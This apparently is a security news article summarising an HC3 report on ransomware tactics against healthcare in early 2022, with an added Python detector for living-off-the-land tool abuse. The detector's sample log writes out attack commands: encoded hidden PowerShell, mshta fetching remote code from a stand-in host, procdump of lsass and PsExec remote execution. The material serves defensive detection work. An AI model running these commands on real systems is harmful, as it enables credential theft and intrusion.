The tactics, techniques, and procedures (TTPs) used by ransomware and other cyber attackers are constantly changing to evade detection and to make their attacks more successful. The Department of Health and Human Services’ Health Sector Cybersecurity Coordination Center (HC3) has reviewed and shared the TTPs used in the first quarter of 2022.
In Q1 2022, most ransomware attacks on the Healthcare and Public Health (HPH) sector were carried out by five ransomware-as-a-service (RaaS) gangs. The LockBit 2.0 and Conti ransomware groups were behind 31% of attacks, followed by SunCrypt (16%), Hive (11%), and ALPHV/BlackCat (11%). The financially motivated threat groups FIN7 and FIN12 have also shifted their operations toward ransomware, with FIN7 (working with ALPHV) and FIN12 heavily involved in attacks on the HPH sector. FIN12’s involvement has shortened the time taken to conduct an attack from 5 days to 2 days.
Ransomware groups commonly partner with initial access brokers (IABs), who specialize in obtaining access to organizations’ networks and then sell that access to the ransomware gangs. Relying on IABs lets ransomware groups concentrate on developing their ransomware variants and running their RaaS operations, which in turn lets them refine their TTPs and conduct more successful attacks. HC3 did not observe any change in the number of IABs partnering with ransomware gangs in Q1 2022, with the same numbers seen throughout 2022.
IABs were most often seen advertising general VPN/RDP access to HPH entities’ systems on cybercrime forums, which accounted for more than half of forum advertisements, while approximately 25% of ads offered compromised Citrix/VPN appliances. Organizations relied heavily on remote access solutions to support remote staff during the COVID-19 pandemic, but the rush to deploy them meant that essential security features were not implemented, and the resulting flaws were widely exploited.
Ransomware groups are increasingly using living-off-the-land (LOTL) techniques in their attacks, abusing legitimate tools that are readily available in large enterprise environments, such as CMD.exe, Task Scheduler, PowerShell, MSHTA, and Sysinternals. Using these tools makes the gangs’ malicious activity harder to detect.
Tactics include the use of:
- remote access tools such as Atera, Windows Safe Mode, AnyDesk, ScreenConnect, and ManageEngine
- encryption tools including BitLocker and DiskCryptor
- file transfer tools such as FileZilla FTP
- Microsoft Sysinternals tools such as Procdump, PsExec, and Dumpert
- open-source tools such as Mimikatz, Cobalt Strike, Process Hacker, MegaSync, and AdFind.
Although malicious use of these tools is difficult for security teams to identify, there are detection opportunities. HC3 recommends a behavior-based approach to detection, for example using a Security Information and Event Management (SIEM) tool, which can uncover malicious use of LOTL tools that signature-based detection tools would miss.
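To make the behavior-based approach concrete, here is an added example (not code from HC3 or from the report) of a small detector that scores process-creation events on how a legitimate tool is invoked rather than on whether it is present, since binaries such as PowerShell, MSHTA, PsExec and Procdump are normal on enterprise hosts. The log format (`ts|user|parent|image|cmdline`), the field names, the rule names and every log line are constructed assumptions; a real SIEM would supply its own schema and rule language, but the logic is the same.

```python
"""
Added example: behaviour-based detection of living-off-the-land (LOTL) tool
abuse over constructed process-creation events. Not part of the HC3 report.
Log schema (ts|user|parent|image|cmdline) and all sample events are made up.
"""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Callable, Dict, List


@dataclass
class Event:
    ts: str        # event timestamp (constructed)
    user: str      # account that launched the process
    parent: str    # parent process name
    image: str     # full path of the launched executable
    cmdline: str   # full command line


@dataclass
class Finding:
    rule: str
    ts: str
    user: str
    image: str


def _exe(path: str) -> str:
    """Lower-cased basename of an image path, so rules are path-independent."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


# Each rule describes *how* a tool is used, which is what distinguishes
# routine administration from attacker behaviour. All are common defender
# heuristics; thresholds and names are assumptions for this example.
RULES: List[tuple] = [
    ("powershell_encoded_command",
     lambda e: _exe(e.image) == "powershell.exe"
     and re.search(r"(^|\s)-(e|ec|enc|encodedcommand)\b", e.cmdline, re.I) is not None),
    ("office_spawns_shell",
     lambda e: e.parent.lower() in {"winword.exe", "excel.exe", "outlook.exe"}
     and _exe(e.image) in {"cmd.exe", "powershell.exe", "mshta.exe", "wscript.exe"}),
    ("mshta_remote_content",
     lambda e: _exe(e.image) == "mshta.exe"
     and re.search(r"https?://|javascript:|vbscript:", e.cmdline, re.I) is not None),
    ("procdump_lsass",
     lambda e: _exe(e.image) == "procdump.exe" and "lsass" in e.cmdline.lower()),
    ("psexec_remote_execution",
     lambda e: _exe(e.image) == "psexec.exe"
     and re.search(r"\\\\[\w.-]+", e.cmdline) is not None),   # UNC target present
]


def parse_line(line: str) -> Event:
    """Parse one pipe-delimited event; cmdline is last so it may contain '|'."""
    ts, user, parent, image, cmdline = line.rstrip("\n").split("|", 4)
    return Event(ts, user, parent, image, cmdline)


def analyze(lines) -> List[Finding]:
    """Run every rule over every event and collect the matches."""
    findings: List[Finding] = []
    for line in lines:
        if not line.strip() or line.startswith("#"):
            continue
        ev = parse_line(line)
        for name, pred in RULES:
            if pred(ev):
                findings.append(Finding(name, ev.ts, ev.user, ev.image))
    return findings


def summarize(findings: List[Finding]) -> Dict[str, int]:
    """Count findings per rule, the shape a SIEM dashboard would show."""
    return dict(Counter(f.rule for f in findings))


# Constructed sample log. Lines 1, 4 and 7 are benign uses of the same tools
# and must not fire; the rest model patterns worth an analyst's attention.
SAMPLE_LOG = r"""
# ts|user|parent|image|cmdline   (constructed sample events)
2022-03-01T09:12:01Z|hosp\jdoe|explorer.exe|C:\Windows\System32\cmd.exe|cmd.exe /c dir
2022-03-01T09:15:22Z|hosp\jdoe|winword.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -nop -w hidden -enc QQBBAEEA
2022-03-01T09:16:03Z|hosp\jdoe|cmd.exe|C:\Windows\System32\mshta.exe|mshta.exe http://example.invalid/page.hta
2022-03-01T10:02:44Z|hosp\svc-backup|services.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -File C:\scripts\backup.ps1
2022-03-01T10:30:10Z|hosp\admin|cmd.exe|C:\Tools\procdump.exe|procdump.exe -ma lsass.exe lsass.dmp
2022-03-01T10:31:55Z|hosp\admin|cmd.exe|C:\Tools\PsExec.exe|PsExec.exe \\fileserver01 -s cmd.exe
2022-03-01T11:00:00Z|hosp\admin|cmd.exe|C:\Tools\PsExec.exe|PsExec.exe -?
"""


if __name__ == "__main__":
    results = analyze(SAMPLE_LOG.strip().splitlines())
    for f in results:
        print(f"{f.ts} {f.rule:28} user={f.user} image={f.image}")
    print(summarize(results))
```

The benign PowerShell backup script, the plain `cmd.exe /c dir` and the `PsExec.exe -?` help invocation produce no findings, while the Word-spawned encoded PowerShell line fires two rules at once (parent/child relationship plus encoded command), which is the kind of correlation a signature on the PowerShell binary alone cannot express.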
The HC3 Ransomware Trends in the HPH Sector report is available at this link. It provides detailed information on the TTPs used by each ransomware operation, including the most frequently abused LOTL tools, the relevant ATT&CK tactics, and an extensive list of mitigations that can be implemented to prevent, detect, respond to, and recover from ransomware attacks.